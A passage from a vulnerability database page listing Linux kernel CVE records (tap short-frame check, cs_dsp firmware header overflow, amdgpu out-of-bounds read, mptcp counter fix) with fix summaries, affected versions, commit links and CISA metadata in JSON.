Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:00:46.396Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8be915fc5ff9a5e296f6538be12ea75a1a93bdea"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7431144b406ae82807eb87d8c98e518475b0450f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e5e5e63c506b93b89b01f522b6a7343585f784e6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ee93e6da30377cf2a75e16cd32bb9fcd86a61c46"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/aa6a5704cab861c9b2ae9f475076e1881e87f5aa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/73d462a38d5f782b7c872fe9ae8393d9ef5483da"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e1a786b9bbb767fd1c922d424aaa8078cc542309"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ed7f2afdd0e043a397677e597ced0830b83ba0b3"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41090",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:24:59.280166Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:06.307Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/tap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8be915fc5ff9a5e296f6538be12ea75a1a93bdea",
              "status": "affected",
              "version": "0efac27791ee068075d80f07c55a229b1335ce12",
              "versionType": "git"
            },
            {
              "lessThan": "7431144b406ae82807eb87d8c98e518475b0450f",
              "status": "affected",
              "version": "0efac27791ee068075d80f07c55a229b1335ce12",
              "versionType": "git"
            },
            {
              "lessThan": "e5e5e63c506b93b89b01f522b6a7343585f784e6",
              "status": "affected",
              "version": "0efac27791ee068075d80f07c55a229b1335ce12",
              "versionType": "git"
            },
            {
              "lessThan": "ee93e6da30377cf2a75e16cd32bb9fcd86a61c46",
              "status": "affected",
              "version": "0efac27791ee068075d80f07c55a229b1335ce12",
              "versionType": "git"
            },
            {
              "lessThan": "aa6a5704cab861c9b2ae9f475076e1881e87f5aa",
              "status": "affected",
              "version": "0efac27791ee068075d80f07c55a229b1335ce12",
              "versionType": "git"
            },
            {
              "lessThan": "73d462a38d5f782b7c872fe9ae8393d9ef5483da",
              "status": "affected",
              "version": "0efac27791ee068075d80f07c55a229b1335ce12",
              "versionType": "git"
            },
            {
              "lessThan": "e1a786b9bbb767fd1c922d424aaa8078cc542309",
              "status": "affected",
              "version": "0efac27791ee068075d80f07c55a229b1335ce12",
              "versionType": "git"
            },
            {
              "lessThan": "ed7f2afdd0e043a397677e597ced0830b83ba0b3",
              "status": "affected",
              "version": "0efac27791ee068075d80f07c55a229b1335ce12",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/tap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.20"
            },
            {
              "lessThan": "4.20",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.281",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.223",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.164",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.102",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.43",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.281",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.223",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.164",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.102",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.43",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.12",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.2",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntap: add missing verification for short frame\n\nThe cited commit missed to check against the validity of the frame length\nin the tap_get_user_xdp() path, which could cause a corrupted skb to be\nsent downstack. Even before the skb is transmitted, the\ntap_get_user_xdp()--\u003eskb_set_network_header() may assume the size is more\nthan ETH_HLEN. Once transmitted, this could either cause out-of-bound\naccess beyond the actual length, or confuse the underlayer with incorrect\nor inconsistent header length in the skb metadata.\n\nIn the alternative path, tap_get_user() already prohibits short frame which\nhas the length less than Ethernet header size from being transmitted.\n\nThis is to drop any frame shorter than the Ethernet header size just like\nhow tap_get_user() does.\n\nCVE: CVE-2024-41090"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:21:51.819Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8be915fc5ff9a5e296f6538be12ea75a1a93bdea"
        },
        {
          "url": "https://git.kernel.org/stable/c/7431144b406ae82807eb87d8c98e518475b0450f"
        },
        {
          "url": "https://git.kernel.org/stable/c/e5e5e63c506b93b89b01f522b6a7343585f784e6"
        },
        {
          "url": "https://git.kernel.org/stable/c/ee93e6da30377cf2a75e16cd32bb9fcd86a61c46"
        },
        {
          "url": "https://git.kernel.org/stable/c/aa6a5704cab861c9b2ae9f475076e1881e87f5aa"
        },
        {
          "url": "https://git.kernel.org/stable/c/73d462a38d5f782b7c872fe9ae8393d9ef5483da"
        },
        {
          "url": "https://git.kernel.org/stable/c/e1a786b9bbb767fd1c922d424aaa8078cc542309"
        },
        {
          "url": "https://git.kernel.org/stable/c/ed7f2afdd0e043a397677e597ced0830b83ba0b3"
        }
      ],
      "title": "tap: add missing verification for short frame",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41090",
    "datePublished": "2024-07-29T06:18:10.896Z",
    "dateReserved": "2024-07-12T12:17:45.635Z",
    "dateUpdated": "2025-11-03T22:00:46.396Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41039 (GCVE-0-2024-41039)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:31 – Updated: 2025-11-03 21:59

Title

firmware: cs_dsp: Fix overflow checking of wmfw header

Summary

In the Linux kernel, the following vulnerability has been resolved: firmware: cs_dsp: Fix overflow checking of wmfw header Fix the checking that firmware file buffer is large enough for the wmfw header, to prevent overrunning the buffer. The original code tested that the firmware data buffer contained enough bytes for the sums of the size of the structs wmfw_header + wmfw_adsp1_sizes + wmfw_footer But wmfw_adsp1_sizes is only used on ADSP1 firmware. For ADSP2 and Halo Core the equivalent struct is wmfw_adsp2_sizes, which is 4 bytes longer. So the length check didn't guarantee that there are enough bytes in the firmware buffer for a header with wmfw_adsp2_sizes. This patch splits the length check into three separate parts. Each of the wmfw_header, wmfw_adsp?_sizes and wmfw_footer are checked separately before they are used.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/fd035f0810b33c2a8…
	https://git.kernel.org/stable/c/9c9877a96e033bf6c…
	https://git.kernel.org/stable/c/49a79f344d0a17c6a…
	https://git.kernel.org/stable/c/3019b86bce16fbb5b…

Impacted products

Vendor

Product

Version

Linux

Affected: f6bc909e7673c30abcbdb329e7d0aa2e83c103d7 , < fd035f0810b33c2a8792effdb82bf35920221565 (git)
Affected: f6bc909e7673c30abcbdb329e7d0aa2e83c103d7 , < 9c9877a96e033bf6c6470b3b4f06106d91ace11e (git)
Affected: f6bc909e7673c30abcbdb329e7d0aa2e83c103d7 , < 49a79f344d0a17c6a5eef53716cc76fcdbfca9ba (git)
Affected: f6bc909e7673c30abcbdb329e7d0aa2e83c103d7 , < 3019b86bce16fbb5bc1964f3544d0ce7d0137278 (git)

Linux

Affected: 5.16
Unaffected: 0 , < 5.16 (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:36.580Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fd035f0810b33c2a8792effdb82bf35920221565"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9c9877a96e033bf6c6470b3b4f06106d91ace11e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/49a79f344d0a17c6a5eef53716cc76fcdbfca9ba"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3019b86bce16fbb5bc1964f3544d0ce7d0137278"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41039",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:23:20.062334Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:03.086Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/firmware/cirrus/cs_dsp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "fd035f0810b33c2a8792effdb82bf35920221565",
              "status": "affected",
              "version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
              "versionType": "git"
            },
            {
              "lessThan": "9c9877a96e033bf6c6470b3b4f06106d91ace11e",
              "status": "affected",
              "version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
              "versionType": "git"
            },
            {
              "lessThan": "49a79f344d0a17c6a5eef53716cc76fcdbfca9ba",
              "status": "affected",
              "version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
              "versionType": "git"
            },
            {
              "lessThan": "3019b86bce16fbb5bc1964f3544d0ce7d0137278",
              "status": "affected",
              "version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/firmware/cirrus/cs_dsp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.16"
            },
            {
              "lessThan": "5.16",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "5.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "5.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "5.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.16",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: cs_dsp: Fix overflow checking of wmfw header\n\nFix the checking that firmware file buffer is large enough for the\nwmfw header, to prevent overrunning the buffer.\n\nThe original code tested that the firmware data buffer contained\nenough bytes for the sums of the size of the structs\n\n\twmfw_header + wmfw_adsp1_sizes + wmfw_footer\n\nBut wmfw_adsp1_sizes is only used on ADSP1 firmware. For ADSP2 and\nHalo Core the equivalent struct is wmfw_adsp2_sizes, which is\n4 bytes longer. So the length check didn\u0027t guarantee that there\nare enough bytes in the firmware buffer for a header with\nwmfw_adsp2_sizes.\n\nThis patch splits the length check into three separate parts. Each\nof the wmfw_header, wmfw_adsp?_sizes and wmfw_footer are checked\nseparately before they are used."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:20:41.899Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/fd035f0810b33c2a8792effdb82bf35920221565"
        },
        {
          "url": "https://git.kernel.org/stable/c/9c9877a96e033bf6c6470b3b4f06106d91ace11e"
        },
        {
          "url": "https://git.kernel.org/stable/c/49a79f344d0a17c6a5eef53716cc76fcdbfca9ba"
        },
        {
          "url": "https://git.kernel.org/stable/c/3019b86bce16fbb5bc1964f3544d0ce7d0137278"
        }
      ],
      "title": "firmware: cs_dsp: Fix overflow checking of wmfw header",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41039",
    "datePublished": "2024-07-29T14:31:53.096Z",
    "dateReserved": "2024-07-12T12:17:45.621Z",
    "dateUpdated": "2025-11-03T21:59:36.580Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46724 (GCVE-0-2024-46724)

Vulnerability from cvelistv5 – Published: 2024-09-18 06:32 – Updated: 2025-11-03 22:17

Title

drm/amdgpu: Fix out-of-bounds read of df_v1_7_channel_number

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix out-of-bounds read of df_v1_7_channel_number Check the fb_channel_number range to avoid the array out-of-bounds read error

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/725b728cc0c8c5faf…
	https://git.kernel.org/stable/c/45f7b02afc464c208…
	https://git.kernel.org/stable/c/32915dc909ff50282…
	https://git.kernel.org/stable/c/f9267972490f9fcff…
	https://git.kernel.org/stable/c/db7a86676fd624768…
	https://git.kernel.org/stable/c/d768394fa99467bcf…

Impacted products

Vendor

Product

Version

Linux

Affected: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 , < 725b728cc0c8c5fafdfb51cb0937870d33a40fa4 (git)
Affected: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 , < 45f7b02afc464c208e8f56bcbc672ef5c364c815 (git)
Affected: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 , < 32915dc909ff502823babfe07d5416c5b6e8a8b1 (git)
Affected: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 , < f9267972490f9fcffe146e79828e97acc0da588c (git)
Affected: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 , < db7a86676fd624768a5d907faf34ad7bb4ff25f4 (git)
Affected: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 , < d768394fa99467bcf2703bde74ddc96eeb0b71fa (git)

Linux

Affected: 4.2
Unaffected: 0 , < 4.2 (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.109 , ≤ 6.1.* (semver)
Unaffected: 6.6.50 , ≤ 6.6.* (semver)
Unaffected: 6.10.9 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46724",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:56:02.346658Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:56:16.475Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:17:05.906Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/df_v1_7.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "725b728cc0c8c5fafdfb51cb0937870d33a40fa4",
              "status": "affected",
              "version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
              "versionType": "git"
            },
            {
              "lessThan": "45f7b02afc464c208e8f56bcbc672ef5c364c815",
              "status": "affected",
              "version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
              "versionType": "git"
            },
            {
              "lessThan": "32915dc909ff502823babfe07d5416c5b6e8a8b1",
              "status": "affected",
              "version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
              "versionType": "git"
            },
            {
              "lessThan": "f9267972490f9fcffe146e79828e97acc0da588c",
              "status": "affected",
              "version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
              "versionType": "git"
            },
            {
              "lessThan": "db7a86676fd624768a5d907faf34ad7bb4ff25f4",
              "status": "affected",
              "version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
              "versionType": "git"
            },
            {
              "lessThan": "d768394fa99467bcf2703bde74ddc96eeb0b71fa",
              "status": "affected",
              "version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/df_v1_7.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.2"
            },
            {
              "lessThan": "4.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.109",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.50",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.109",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.50",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.9",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Fix out-of-bounds read of df_v1_7_channel_number\n\nCheck the fb_channel_number range to avoid the array out-of-bounds\nread error"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-16T08:02:50.121Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/725b728cc0c8c5fafdfb51cb0937870d33a40fa4"
        },
        {
          "url": "https://git.kernel.org/stable/c/45f7b02afc464c208e8f56bcbc672ef5c364c815"
        },
        {
          "url": "https://git.kernel.org/stable/c/32915dc909ff502823babfe07d5416c5b6e8a8b1"
        },
        {
          "url": "https://git.kernel.org/stable/c/f9267972490f9fcffe146e79828e97acc0da588c"
        },
        {
          "url": "https://git.kernel.org/stable/c/db7a86676fd624768a5d907faf34ad7bb4ff25f4"
        },
        {
          "url": "https://git.kernel.org/stable/c/d768394fa99467bcf2703bde74ddc96eeb0b71fa"
        }
      ],
      "title": "drm/amdgpu: Fix out-of-bounds read of df_v1_7_channel_number",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46724",
    "datePublished": "2024-09-18T06:32:21.220Z",
    "dateReserved": "2024-09-11T15:12:18.255Z",
    "dateUpdated": "2025-11-03T22:17:05.906Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-45009 (GCVE-0-2024-45009)

Vulnerability from cvelistv5 – Published: 2024-09-11 15:13 – Updated: 2025-11-03 22:15

Title

mptcp: pm: only decrement add_addr_accepted for MPJ req

Summary

In the Linux kernel, the following vulnerability has been resolved: mptcp: pm: only decrement add_addr_accepted for MPJ req Adding the following warning ... WARN_ON_ONCE(msk->pm.add_addr_accepted == 0) ... before decrementing the add_addr_accepted counter helped to find a bug when running the "remove single subflow" subtest from the mptcp_join.sh selftest. Removing a 'subflow' endpoint will first trigger a RM_ADDR, then the subflow closure. Before this patch, and upon the reception of the RM_ADDR, the other peer will then try to decrement this add_addr_accepted. That's not correct because the attached subflows have not been created upon the reception of an ADD_ADDR. A way to solve that is to decrement the counter only if the attached subflow was an MP_JOIN to a remote id that was not 0, and initiated by the host receiving the RM_ADDR.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/35b31f5549ede4070…
	https://git.kernel.org/stable/c/85b866e4c4e63a1d7…
	https://git.kernel.org/stable/c/d20bf2c96d7ffd171…
	https://git.kernel.org/stable/c/2060f1efab370b496…
	https://git.kernel.org/stable/c/1c1f721375989579e…

Impacted products

Vendor

Product

Version

Linux

Affected: d0876b2284cf8b34dd214b2d0aa21071c345da59 , < 35b31f5549ede4070566b949781e83495906b43d (git)
Affected: d0876b2284cf8b34dd214b2d0aa21071c345da59 , < 85b866e4c4e63a1d7afb58f1e24273caad03d0b7 (git)
Affected: d0876b2284cf8b34dd214b2d0aa21071c345da59 , < d20bf2c96d7ffd171299b32f562f70e5bf5dc608 (git)
Affected: d0876b2284cf8b34dd214b2d0aa21071c345da59 , < 2060f1efab370b496c4903b840844ecaff324c3c (git)
Affected: d0876b2284cf8b34dd214b2d0aa21071c345da59 , < 1c1f721375989579e46741f59523e39ec9b2a9bd (git)

Linux

Affected: 5.10
Unaffected: 0 , < 5.10 (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-45009",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T15:51:12.192901Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T15:51:26.527Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:15:15.298Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
